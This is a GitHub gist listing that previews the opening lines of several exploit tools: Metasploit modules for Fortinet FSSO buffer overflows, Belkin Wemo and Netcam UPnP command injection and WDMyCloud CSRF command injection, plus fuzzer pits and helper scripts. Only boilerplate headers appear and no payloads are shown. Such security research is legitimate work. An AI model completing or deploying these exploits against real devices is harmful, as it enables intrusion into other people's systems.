@phikshun
phikshun / backdoor.sh
Created June 20, 2017 17:36
I am a backdoor
#!/bin/bash
echo "I am an evil backdoor"
@phikshun
phikshun / fsso_buffer_overflow.rb
Created March 29, 2015 20:39
Fortinet FSSO Stack Buffer Overflow Exploit
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
@phikshun
phikshun / fsso_dcagent_overflow.rb
Created March 29, 2015 20:23
Fortinet FSSO DCAgent Exploit
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
@phikshun
phikshun / calc_magic.rb
Created March 29, 2015 20:19
DCAgent Exploit Kernel32.dll Offset Generator
#!/usr/bin/env ruby
require 'pedump'
require 'colorize'
@lang = {
0x0401 => 'ar',
0x0415 => 'pl',
0x0402 => 'bg',
0x0416 => 'pt-br',
@phikshun
phikshun / dcagent.xml
Created March 29, 2015 19:44
Fortinet FSSO DCAgent Protocol Peach Pit
<?xml version="1.0" encoding="utf-8"?>
<Peach xmlns="http://peachfuzzer.com/2012/Peach" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://peachfuzzer.com/2012/Peach ../peach.xsd">
<DataModel name="DataTSAgent">
<Number name="Length" size="16" endian="big">
<Relation type="size" of="Main" expressionSet="size+2" />
</Number>
<Block name="Main">
<Number name="Timestamp" size="32" valueType="string" value="1420054000" signed="false" endian="big">
@phikshun
phikshun / fsso.xml
Created March 22, 2015 20:27
Fortinet FSSO Peach Pit
<?xml version="1.0" encoding="utf-8"?>
<Peach xmlns="http://peachfuzzer.com/2012/Peach" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://peachfuzzer.com/2012/Peach ../peach.xsd">
<DataModel name="FSSO">
<Number name="PktLen" size="32" endian="big">
<Relation type="size" of="Main" expressionSet="size+4" />
</Number>
<Block name="Main">
<Number name="PktTag" valueType="hex" value="80" size="8" endian="big" />
@phikshun
phikshun / wemo_upnp_exec.rb
Last active October 13, 2017 19:13
Belkin Wemo SmartSwitch UPnP Remote Command Injection
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
@phikshun
phikshun / belkin_netcamhd_cmd_injection.rb
Created April 4, 2014 22:53
Belkin Netcam HD UPnP Command Injection
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Belkin Netcam HD UPnP Command Injection",
@phikshun
phikshun / wdmycloud_cmd_injection_csrf.rb
Created March 20, 2014 00:51
WDMyCloud Command Injection CSRF
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'WDMyCloud NAS Command Injection CSRF',
@phikshun
phikshun / netstat.rb
Created March 19, 2014 00:50
Netstat.rb
#!/usr/bin/env ruby
require 'net/telnet'
require 'colorize'
display_sockets = false
usage = "Usage: ./netstat.rb <host> <username> [password]\n"
host = ARGV[0]
user = ARGV[1] || ''
pass = ARGV[2] || ''